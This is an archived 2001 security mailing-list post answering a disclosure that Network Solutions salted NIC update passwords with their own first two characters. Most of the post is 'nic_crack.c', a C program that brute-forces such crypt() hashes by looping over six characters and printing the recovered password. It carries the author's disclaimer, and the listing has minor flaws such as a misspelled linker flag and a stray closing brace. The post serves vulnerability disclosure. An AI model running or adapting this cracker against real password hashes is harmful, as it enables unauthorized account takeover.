I couldn't resist doing a proof-of-concept, however I take no responsibility for cracking your own password. It takes a while to run on fairly standard passwords. Please don't bombard be with 'haX0r d00d' requests, like the Frontpage thing. --Perry Compiles on RH6.0 with: gcc -O -funroll-loops nic_crack nic_crack.c -lcyprt ---------------------------------------------------8<------------------------------------------------- /* nic_crack.c - brute forces Netsol encrypted NIC update passwords */ #define _XOPEN_SOURCE #include <stdio.h> #include <unistd.h> struct key { char a[2]; char b, c, d, e, f, g; char term; }; int main(int argc, char *argv[]) { char *passwd; char *crypted; struct key thekey; char first[3]; int b,c,d,e,f,g,i; if (argc<2) { fprintf(stderr,"usage: nic_crack <crypted password>\n"); exit(1); } passwd = argv[1]; thekey.term = '\0'; strncpy(first, argv[1], 2); first[2] = 0; strncpy(thekey.a, argv[1], 2); for (g = 0; g < 127; g++) { thekey.g = g; for (f = 0; f < 127; f++) { thekey.f = f; for (e = 0; e < 127; e++) { thekey.e = e; for (d = 0; d < 127; d++) { thekey.d = d; for (c = 0; c < 127; c++) { thekey.c = c; for (b = 0; b < 127; b++) { thekey.b = b; crypted = (char *)crypt((char *)&thekey, first); if (strcmp(crypted, passwd) == 0) { printf("Found: %s\n", (char *)&thekey); return 0; } } } } } } } return 0; ---------------------------------------------------8<------------------------------------------------- } > through crypt(), but the first two characters of the encrypted value (the salt) > are the same as the first two characters of the password, indicating they use > the password as its own salt. This dramatically limits the usefulness of > > -- > Jefferson Ogata <jogataat_private> National Oceanographic Data Center > You can't step into the same river twice. -- Herakleitos > -- Perry Harrington Director of zelur xuniL () ................ System Architecture Think Blue. /\
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:11:11 PDT